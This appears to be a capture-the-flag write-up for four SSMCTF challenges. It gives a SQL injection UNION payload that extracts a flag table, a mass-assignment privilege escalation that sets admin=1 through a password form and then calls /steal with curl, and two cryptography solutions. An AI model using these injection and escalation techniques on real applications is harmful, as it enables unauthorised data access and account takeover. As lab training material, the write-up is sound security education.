Web#

Boy!#

Chall

Boy1

TLDR: SQL Injection

Code Review#

Key portions of the Flask application:

1
def search(boy):
2
    # Build a blacklist generator (non-letter characters)
3
    blacklist = (c for c in printable if c not in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")
4

5
    # Prevent direct flag references
6
    if 'flag' in boy:
7
        return "nope!"
8

9
    # Filter out blacklisted characters
10
    filtered = ''.join(ch for ch in boy if ch not in blacklist)
11

12
    # Vulnerable query construction
13
    query = f"SELECT duhhh FROM duh WHERE boy = '{filtered}'"
14
    cursor.execute(query)
15
    ...

Vulnerability#

The filtered input is interpolated directly into the SQL string.
Only non-letter characters are filtered; single quotes (') remain, so the attacker can terminate the string literal.

Exploitation Steps#

String termination: Use a single quote (') to close the boy string literal.
UNION injection: Append UNION SELECT substr(FLAGtext,2,100) FROM FLAG to extract the flag.
Comment out the rest of the query with --.

Final payload:

1
X' UNION SELECT substr(FLAGtext,2,100) FROM FLAG--

Payload Explanation#

X': Closes the original WHERE boy = 'X' string.
UNION SELECT ...: Combines results from the flag table.
substr(FLAGtext,2,100): Skips the first character to bypass an initial filter or formatting.
--: Comments out any trailing SQL.

Flag#

Boy2 After submitting the payload, the application returns:

1
SSMCTF{b-b-bb-b-oy:::;bob-b-oy;;duh!duh!duh!duh!}

Stealing Treasure#

Challenge Screenshot

Challenge Description#

This endpoint allows authenticated users to update their own account fields via the /password form and access protected treasure resources. However, it fails to restrict which columns can be modified, enabling privilege escalation.

Code Review#

1
def auth():
2
    token = request.cookies.get('token')
3
    if token:
4
        decoded = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
5
        return decoded['id'], decoded['admin']
6
    return -1, 0
7

8
@app.route('/password', methods=['GET', 'POST'])
9
def password():
10
    if request.method == 'POST':
11
        id, admin = auth()
12
        updates = [[k, request.form.get(k)] for k in request.form]
13
        # Dynamically update any column present in form data
14
        for field, val in updates:
15
            cols = [col[1] for col in sqlite3.connect('treasure.db')
16
                    .execute('PRAGMA table_info(users)').fetchall()]
17
            if field in cols:
18
                # No restriction on 'admin' field
19
                sqlite3.connect('treasure.db')
20
                    .execute(f"UPDATE users SET {field} = ? WHERE id = ?", (val, id))
21
                sqlite3.connect('treasure.db').commit()
22
        return jsonify({'status': 'success'})

Vulnerability#

The password route builds its SQL update statement dynamically from form keys without banning sensitive columns.
Attackers can inject admin=1 in the form data to grant themselves admin privileges.

Exploitation Steps#

Authenticate as a regular user (admin = 0) and obtain the token cookie.
Send a POST request to /password with form data:
```
1
password=yourCurrentPassword
2
admin=1
```
This sets your admin column to 1 in the database.
Visit /logout to clear the old token cookie.
Log in again with your credentials to receive a new JWT containing "admin":1.
Access the /steal endpoint using your token cookie:
Terminal window
```
1
curl -b "token=<your_jwt_cookie>" https://<host>/steal
```
The server responds with stolen treasure.
Browse to /treasure to view the stolen items and the flag.

Flag#

FLAG

1
SSMCTF{Br0ken_acc33ss_c0ntr0l_succ44ssful_aad01750ee1b}

Crypto#

Cauldron#

Challenge Screenshot

NOTE
This challenge applies a combination of three transformations—Caesar shift (C), Base64 encoding (B), reversal (R), character-pair substitution (S), XOR with 255 (X), and ASCII-based grouping (O)—to a fixed plaintext and the secret flag. By testing all possible compositions on the sample text and finding the matching pattern, we can reverse the same sequence on the encoded flag to recover it.

1
from secret import flag
2
# C = Caesar Cipher?
3
def C(text):
4
    ...
5
# B = base64?
6
def B(text):
7
    ...
8
# R = reverse?
9
def R(text):
10
    ...
11
# S= subsitution?
12
def S(text):
13
    ...
14
# X = XOR?
15
def X(text):
16
    ...
17
# O = ascii?
18
def O(text):
19
    ...
20
text = "Double, double, toil and trouble. Fire burn and cauldron bubble!"
21
functions = [C, B, R, S, X, O]
22

23
output = open('output.txt', 'w')
24

25
for func1 in functions:
26
    for func2 in functions:
27
        for func3 in functions:
28
            output.write(func1(func2(func3(text))))
29
            output.write('\n')
30

31
for func in functions:
32
    flag = func(flag)
33

34
output.write(flag)
35
output.close

Determining the Sequence#

By enumerating all 6×6×6 = 216 function combinations We can get the list of functions combinations with the correct order. Therefore we can just guess each functions individually.

1
# Print all possible combinations of function names
2
functions = ['C', 'B', 'R', 'S', 'X', 'O']
3

4
# Keep track of how many combinations we've printed
5
count = 0
6

7
for func1 in functions:
8
    for func2 in functions:
9
        for func3 in functions:
10
            # Print the function composition
11
            print(f"{count+1}: {func1}({func2}({func3}(text)))")
12
            count += 1
13

14
print(f"\nTotal combinations: {count}")

We implement each reversal to invert the transformations:

I initially identified ‘B’ as Base64 encoding based on the function names provided for each line. This allowed me to correctly deduce the function ‘A’ in sequence ‘BBA’ without needing to test other functions. Using a similar approach, I systematically deduced the transformations for all other functions as well.

Lastly the solution script:

1
def reverse_O(data):
2
    # Split by "!"
3
    tokens = data.split("!")
4

5
    result = ""
6

7
    for token in tokens:
8
        # Skip empty tokens
9
        if not token:
10
            continue
11

12
        # Remove any leading space
13
        token = token.strip()
14
        if not token:
15
            continue
16

17
        # Group characters into sets of 3
18
        groups = [token[i:i+3] for i in range(0, len(token), 3)]
19

20
        # Extract middle character from each complete group
21
        for group in groups:
22
            if len(group) == 3:  # Only process complete groups
23
                result += group[1]
24

25
    # Add "!" at the end if the original string ends with "!"
26
    if data.endswith("!"):
27
        result += "!"
28

29
    return result
30

31
def reverse_X(data):
32
    # X is XOR with key 255
33
    key = 255
34
    result = ''
35

36
    # Input is comma-separated decimals
37
    numbers = [int(x) for x in data.split(',')]
38

39
    for number in numbers:
40
        result += chr(number ^ key)
41
    return result
42

43
def reverse_S(data):
44
    # S swaps adjacent character pairs
45
    result = ''
46
    i = 0
47
    while i < len(data):
48
        if i+1 < len(data):
49
            # Swap each pair of characters
50
            result += data[i+1] + data[i]
51
            i += 2
52
        else:
53
            # Handle odd length
54
            result += data[i]
55
            i += 1
56
    return result
57

58
def reverse_R(data):
59
    return data[::-1]
60
def reverse_B(data):
61
    import base64
62
    try:
63
        # Add padding if needed
64
        missing_padding = len(data) % 4
65
        if missing_padding:
66
            data += '=' * (4 - missing_padding)
67
        return base64.b64decode(data).decode('utf-8')
68
    except:
69
        # If base64 decoding fails, return original
70
        return data
71
def reverse_C(data):
72
    return ''.join(chr(ord(c) - 7) for c in data)
73
def decode_flag(encoded_flag):
74
    # Apply reverse functions in reverse order
75
    data = encoded_flag
76
    data = reverse_O(data)
77
    data = reverse_X(data)
78
    data = reverse_S(data)
79
    data = reverse_R(data)
80
    data = reverse_B(data)
81
    data = reverse_C(data)
82
    return data
83

84
# The encoded flag
85
encoded_flag = "012678345+,-01289:345+,-012234567+,-012345345+,-01256789:+,-012345012+,-012456234+,-012789234+,-012345789+,-123/01345+,-012456789+,-012789234+,-123/01567+,-012345567+,-012456567+,-123/01456+,-012345345+,-123/01012+,-012456345+,-012567678+,-012456456+,-01289:89:+,-012456123+,-012789678+,-012456678+,-012789789+,-012456456+,-012567789+,-012234456+,-012567456+,-012456345+,-123/01345+,-012234456+,-012345567+,-012678678+,-123/01345+,-012789/01+,-01289:/01+,-012567456+,-012345/01+,-01256789:+,-012345012+,-012678567+,-123/01345+,-01278989:+,-012345567+,-012234567+,-012345345+,-012789123+,-123/01012+,-012678678+,-123/01345+,-012567456+,-123/01345+,-012456123+,-012789345+,-012345012+,-012789789+,-012456567+,-01234589:+,-01289:89:+,-123/01345+,-012567456+,-012345567+,-01289:89:+,-123/01012+,-012456345+,-123/01456+,-012456456+,-012345567+,-012678123+,-012234234+,-012234456+,-012345567+,-012678678+,-123/01567+,-012789012+,-012456123+,-012234567+,-012345345+,-01223489:+,-012678678+,-012678123+,-012345678+,-012345234+,-012678/01+,-012567789+,-012345678"
86

87
# Decode and print the flag
88
flag = decode_flag(encoded_flag)
89
print(flag)

Flag#

SSMCTF{Y0U_D0_th3_h0k3y_p0k3y_4nd_y0u_tuRn_y0urs3lf_ar0und}

Tariff Evaluation#

Chall-tariffevaluation

This challenge is a RSA but with p-leak as a hint:

1
gap.eval('LoadPackage("ctbllib")')
2
q = PowerSeriesRing(QQ, 'q').gen()
3
GLOBAL_1 = factorial(10000)
4
GLOBAL_2 = 0.00001
5
leak = ((lambda VAR_1: nplog(VAR_1) - VAR_1/(len([VAR_2 for VAR_2 in range(2, VAR_1) if ( lambda VAR_1: all([VAR_1 % VAR_2 for VAR_2 in range(2, VAR_1)]))(VAR_2)])))(GLOBAL_1)) * ((round((1728 * ((4/3) * (1 + 240 * sum([(lambda VAR_1, VAR_2: sum([VAR_3**VAR_1 for VAR_3 in divisors(VAR_2)]))(3, n) * q**n for n in range(1, 5)])))**3 / (((4/3) * (1 + 240 * sum([(lambda VAR_1, VAR_2: sum([VAR_3**VAR_1 for VAR_3 in divisors(VAR_2)]))(3, n) * q**n for n in range(1, 5)])))**3 - 27*((8/27) * (1 - 504 * sum([(lambda VAR_1, VAR_2: sum([VAR_3**VAR_1 for VAR_3 in divisors(VAR_2)]))(5, n) * q**n for n in range(1, 5)])))**2).add_bigoh(5)).add_bigoh(5)[1])-ast.literal_eval(gap.eval('List(Irr(CharacterTable("M")), chi -> Degree(chi));'))[1])) * ((lambda VAR_3: lambda VAR_1: sum([(VAR_1**VAR_2) * (VAR_3[VAR_2 % 4] / (lambda VAR_1: VAR_1 * factorial(VAR_1-1) if VAR_1 else 1)(VAR_2)) for VAR_2 in range(GLOBAL_1)]))([0, 1, 0, -1])(1) ** 2 + (lambda VAR_3: lambda VAR_1: sum([(VAR_1**VAR_2) * (VAR_3[VAR_2 % 4] / (lambda VAR_1: VAR_1 * factorial(VAR_1-1) if VAR_1 else 1)(VAR_2)) for VAR_2 in range(GLOBAL_1)]))([1, 0, -1, 0])(1) ** 2) + (lambda FUNC, VAR_1, VAR_2: sum([GLOBAL_2 * FUNC(VAR_3) for VAR_3 in arange(VAR_1, VAR_2, GLOBAL_2)]))((lambda VAR_3: lambda VAR_1: sum([(VAR_1**VAR_2) * (VAR_3[VAR_2 % 4] / (lambda VAR_1: VAR_1 * factorial(VAR_1-1) if VAR_1 else 1)(VAR_2)) for VAR_2 in range(GLOBAL_1)]))([0, 1, 0, -1]), -0.5, 0.5) * ((lambda VAR_1: int(f'0x{md5(b64decode(VAR_1)).hexdigest()}', 16))("YQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJtT15kGLJVhHSym6g/aYwYYJMzurOZMzzCafGZ3wpH8EuT1veo0GdLnJUYh7YMYccigMh4+nd0w1GMZhFkwPUSzGK9QghJEhBsQ/TAdrz1zrlB2Oxo4oSLdO/TEWBldns0w3uIrGHN1caStr+JhTaqZWpB9u9DZQpUdmHFcIZnf") / (lambda VAR_1: int(f'0x{md5(b64decode(VAR_1)).hexdigest()}', 16))("YQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJtT15kGLJVhHSym6g/aYwYYJMxurOZMzzCafGZ3wpH8EuT1veo0GdLnJUYh7QMZccigMh4+nd0w1GMZBFkwPUSzGK9QghJEhBsQ/TAdrz1zrlB2uxo4oSLdO/TEWBldns0w3uIrGHN1caStr+LhTKqZWpB9u9DZQpUdmPFcIZnf")) * ((lambda VAR_1: reduce(lambda VAR_2, _: 1 + 1 / VAR_2, range(VAR_1 - 1), 1))(GLOBAL_1) ** 2 - (lambda VAR_1: reduce(lambda VAR_2, _: 1 + 1 / VAR_2, range(VAR_1 - 1), 1))(GLOBAL_1))
6

7
pt = bytes_to_long(flag.encode('utf-8'))
8
p, q = getPrime(1024), getPrime(1024)
9
n = p * q
10
ct = pow(pt, 0x10001, n)
11

12
print(f'{ct = }')
13
print(f'{n = }')
14
print(f'{p - leak = }')

Turns out leak is actually just a fancy function, the value is 1

1
p=
2
l= #leak
3
print(p-l)
4
# 1

Solution script#

Therefore we have p already by just adding leak+1:

1
from Crypto.Util.number import *
2
p =
3
n =
4
ct =
5
q = n//p
6
assert n == p*q
7
phi= (p-1)*(q-1)
8
e= 65537
9
d = pow(e, -1, phi)
10
flag = pow(ct,d,n)
11
print(long_to_bytes(flag))

Flag#

SSMCTF{This is a great time to get rich, richer than ever before!!! The markets are going to boom, the stock is going to boom!}